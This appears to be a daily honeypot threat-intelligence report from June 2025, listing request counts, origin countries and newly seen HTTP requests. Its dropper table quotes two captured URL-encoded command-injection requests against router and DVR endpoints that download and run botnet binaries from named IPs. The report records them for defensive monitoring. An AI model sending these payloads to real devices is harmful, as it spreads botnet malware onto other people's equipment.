Skip to main content
  1. Daily-Posts/

Report: 2025-06-22

·398 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-22
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 23 new requests that have never been observed before (these were added to the monitored request database.).

A total of 807 requests were recorded during the day, originating from 2 different countries, with a peak of 230 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
BRGermany
USGermany
KRGermany
SGGermany
FRDubai
USDubai
US
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
45.135.194.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F14.103.145.202%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F14.103.145.202%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1
144.172.112.208POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.32%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
175GET /phpMyAdmin/index.php HTTP/1.1
1801\x00\x0E8ro\xB9w7\xAE\xB1Q\x00\x00\x00\x00\x00
1811GET /socket.io/1/?t=1750560403883 HTTP/1.1
1831GET /okO4 HTTP/1.1
1841GET /WPKj HTTP/1.1
2001GET /Odin/http/call1750556917 HTTP/1.1
2011GET /OdinHttpCall1750556917 HTTP/1.1
2021GET /odinhttpcall1750556917 HTTP/1.1
2051GET /varayu HTTP/1.1
2061GET /wzlhmj HTTP/1.1
2121GET /WebClient.html HTTP/1.1
2171GET /Odin/http/call1750558162 HTTP/1.1
2181GET /OdinHttpCall1750558162 HTTP/1.1
2191GET /odinhttpcall1750558162 HTTP/1.1
2361\x00\x0E8’Z\xFF\x17cn\xF1\x93\x00\x00\x00\x00\x00
2391\x00\x0E8\x02’\x07\xF7\xCE\xCE\xBA4\x00\x00\x00\x00\x00
2401GET http://ifconfig.me/ HTTP/1.1
2431GET /6Yjd HTTP/1.1
2441GET /Hqn5 HTTP/1.1
2591GET /Odin/http/call1750582978 HTTP/1.1
2601GET /OdinHttpCall1750582978 HTTP/1.1
2611GET /odinhttpcall1750582978 HTTP/1.1
2931\x00\x0E8\x80\x10\xA0&\xDEc\xDB\xC0\x00\x00\x00\x00\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0230US
1128DE
271CN
370NL
459BG
546FR
630SG
725JP
819GB
911CA
1011BR
1111CH
1210PL
1310GH
149KR
156NG
166LT
176IN
185IL
195BE
204HK
214MD
223AR
233IR
243KZ
253RU
262UA
272AE
282SC
292TW
302TN
312IE
322EE
331MC
341KE
351PT
361MX
371ES

Related

Report: 2025-06-21
·525 words
Repport Daily
Report: 2025-06-20
·340 words
Repport Daily
Report: 2025-06-19
·456 words
Repport Daily